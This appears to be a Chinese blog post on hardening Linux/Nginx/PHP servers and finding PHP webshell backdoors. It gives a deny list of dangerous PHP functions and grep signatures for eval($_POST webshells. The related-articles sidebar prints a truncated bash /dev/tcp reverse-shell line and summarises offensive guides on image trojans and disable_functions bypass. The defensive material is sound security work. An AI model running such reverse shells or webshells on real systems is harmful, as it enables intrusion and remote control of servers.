linux上php木马、后门查杀总结

最新推荐文章于 2024-04-17 06:30:00 发布
最新推荐文章于 2024-04-17 06:30:00 发布
阅读量4.6k 收藏 2
点赞数 1
分类专栏: 安全 文章标签: php linux include server nginx web
 

Web Server(Nginx为例)
1、为防止跨站感染,要做虚拟主机目录隔离(我是直接利用fpm建立多个程序池达到隔离效果)
2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)
3、path_info漏洞修正:
if ($request_filename ~* (.*)\.php) {
set $php_url $1;
}
if (!-e $php_url.php) {
return 404;
}
4、重新编译Web Server,隐藏Server信息。
5、打开相关级别的日志,追踪可疑请求,请求者IP等相关信息。

改变目录和文件属性,禁止写入
find -type f -name \*.php -exec chmod 444 {} \;
find -type d -exec chmod 555 {} \;
注:当然要排除上传目录、缓存目录等;
同时最好禁止chmod函数,攻击者可通过chmod来修改文件只读属性再修改文件!

PHP配置
禁用危险函数:
dl,eval,exec,passthru,system,popen,shell_exec,proc_open,proc_terminate,curl_exec,curl_multi_exec,show_source,touch,escapeshellcmd,escapeshellarg

MySQL账号安全:
禁止mysql用户外部链接,程序不要使用root账号,最好单独建立一个有限权限的账号专门用于Web程序。

查杀木马、后门
常见的一句话后门:
grep -r –include=*.php  ‘[^a-z]eval($_POST’ . > grep.txt
grep -r –include=*.php  ‘file_put_contents(.*$_POST\[.*\]);’ . > grep.txt
把搜索结果写入文件,下载下来慢慢分析,其他特征木马、后门类似。有必要的话可对全站所有文件来一次特征查找,上传图片肯定有也捆绑的,来次大清洗。

查找近2天被修改过的文件:
find -mtime -2 -type f -name \*.php
注意:攻击者可能会通过touch函数来修改文件时间属性来避过这种查找,所以touch必须禁止

最后要及时补上Web程序漏洞

总结
木马、后门查杀是个漫长的过程,网站一旦被入侵任何旮旯拐角都可能留下后门。中途可能和攻击者进行神交,摸清攻击者的性格、习性等,这些都有利于查杀。要现需谨慎地和攻击者交流,期间就有几个攻击者加我QQ和我交流。
也是个很有意思的过程

我把金钱献给你
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
PHP 图片木马隐写方法及靶机演示
百彦子烨的博客
11-11 3424
通常在木马的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上传图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木马隐藏到图片中,以此来绕过防御,进行上传。
php 木马 加密,PHP木马大全 一句话的PHP木马的防范
weixin_34208400的博客
03-09 1331
PHP木马大全一句话的PHP木马的防范(2015-01-28 22:12:07)标签:it分类:phpphp后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen,proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode,gzinflat...
PHP一句话木马
Code-5的博客
04-17 945
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
利用MSF生成php,windows,Linux三类木马
2301_76786857的博客
03-19 1494
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
kali下Burpsuite对网站后台注入php木马
qq_43776408的博客
05-20 2195
先给kali浏览器设置代理 后面输入你的端口号 打开后,先关闭拦截 因为i我们只要拦截重要的就行了 接下来打开浏览器 访问我们搭建的网站 这时在点击开始拦截就可以了 右键空白 send to repeater 送往中继器 因为中继器是可以改包的 然后你切换到Burp的中继器 你就在刚才那个界面上找,肯定能找到repeaterCHR是加密的,防止别查杀 %0a和%0d是回车和换行的,ASCII码 eval函数可以把一段字符串当作php代码运行 常用于黑客 一般杀毒软件过滤eval函数 CHR可以对eva.
防止和修复php网站被挂木马(宝塔)
qq_40194668的博客
01-13 5130
防止和修复php网站被挂木马
Linux系统木马后门查杀方法详解
01-09
以下从几个方面在说明Linux系统环境安排配置防范和木马后门查杀的方法:  一、Web Server(以Nginx为例)  1、为防止跨站感染,将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)  2、上传...
360webscan后门查杀php专版
04-18
自用的,360webscan后门查杀php专版,3个文件均能扫描,上传到网站根目录下运行
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
php实现Linux服务器木马排查及加固功能
10-24
在网络安全日益重要的今天,PHP实现Linux服务器木马排查及加固功能显得至关重要。本文将详细讲解如何利用PHP进行木马排查以及采取哪些措施来加固服务器安全。 首先,针对特征码查找是木马排查的基础。PHP木马通常会...
web木马后门查杀工具.zip
11-15
web木马后门查杀工具
过宝塔php大马,分享宝塔网站防火墙使用帮助
weixin_39757122的博客
03-20 882
下面由宝塔面板教程栏目给大家分享宝塔网站防火墙使用帮助,希望对需要的朋友有所帮助!推荐教程:《宝塔面板》Nginx防火墙建议使用Nginx 1.18 及其以上版本。兼容性更佳如果是小于1.18的版本 编译安装的兼容性也是OK的。建议低版本的Nginx 更新至Nginx1.18 或者Nginx 1.19简介:一直都有用户建议我们开发木马扫描,木马清理模块,但我们认为与其亡羊补牢,不如直接在源头上阻...
实战绕过宝塔PHP disable_function 限制getshell
zhangge3663的博客
03-09 3642
一、这次做的目标站点是一个某XX站点,通过前期的信息收集,可以发现该站点是由宝塔(一般根服务器开放端口888、8888和报错界面判定)+ShuipfCMS框架搭建的 端口信息 后台 二、默认的ShuipfCMS系统后台访问http://www.xxx.com/admin/会自动跳转到后台,但是这个站点感觉是被二次开发过的,站点后台和前端页面不在同一个子域名下,该后台还是通过收集子域名得到的,访问某xxx.xxx.com会自动跳转到后台登录页面。 三、这里想着尝试绕过验证码来对后台用户名密码进
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
php liunx反弹大马,Linux 下反弹 Shell 方法总结
weixin_33895274的博客
03-12 385
原标题:Linux 下反弹 Shell 方法总结16004488 所谓反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上。实验环境:CentOS 6.5:192.168.0.3kali2.0:192.168.0.4方法一反弹shell命令如下:bash -i >& /dev/tcp/ip/po...
php后门木马常用命令分析与防范
主题模板站的博客
01-22 791
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite。2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13。//可将php代码存于非php后缀文件,例: x.jpg。
kali PHP网站渗透,小白日记35:kali渗透测试之Web渗透
weixin_39541844的博客
03-11 1902
手动漏洞挖掘即扫描后,如何对发现的漏洞告警进行验证。#默认安装流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。漏洞类型--远程命令执行1、phpMyadmin安装在web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径...
Linux系统***后门查杀方法详解
weixin_33676492的博客
11-27 288
***和后门查杀是系统管理员一项长期需要坚持的工作,切不可掉以轻心。以下从几个方面在说明Linux系统环境安排配置防范和***后门查杀的方法:一、Web Server(以Nginx为例)1、为防止跨站感染,将虚拟主机目录隔离(可以直接利用fpm建立多个程序池达到隔离效果)2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)3、path_info漏洞...
cobaltstrike木马查杀
最新发布
04-26
CobaltStrike是一种常见的渗透测试工具,也被黑客用于进行网络攻击。查杀CobaltStrike木马需要采取以下步骤: 1. 实时监测:使用安全防护软件或网络安全设备,如防火墙、入侵检测系统(IDS)等,对网络流量进行实时监测,以便及时发现CobaltStrike木马的活动。 2. 文件扫描:使用杀毒软件对系统文件和进程进行全盘扫描,以查找和清除CobaltStrike木马相关的文件和进程。 3. 网络流量分析:通过分析网络流量,检测是否存在与CobaltStrike木马相关的通信行为,如与CobaltStrike C&C服务器的连接等。 4. 主机行为分析:通过监控主机的行为,检测是否存在CobaltStrike木马的典型行为特征,如异常的系统进程、异常的网络连接等。 5. 漏洞修复:及时修复系统和应用程序的漏洞,以减少CobaltStrike木马利用漏洞进行入侵的可能性。 6. 安全策略加固:加强网络安全策略,限制外部访问、禁用不必要的服务、加强密码策略等,以提高系统的安全性。 7. 安全培训与意识提升:加强员工的安全培训和意识提升,提高对CobaltStrike木马等网络威胁的识别和防范能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值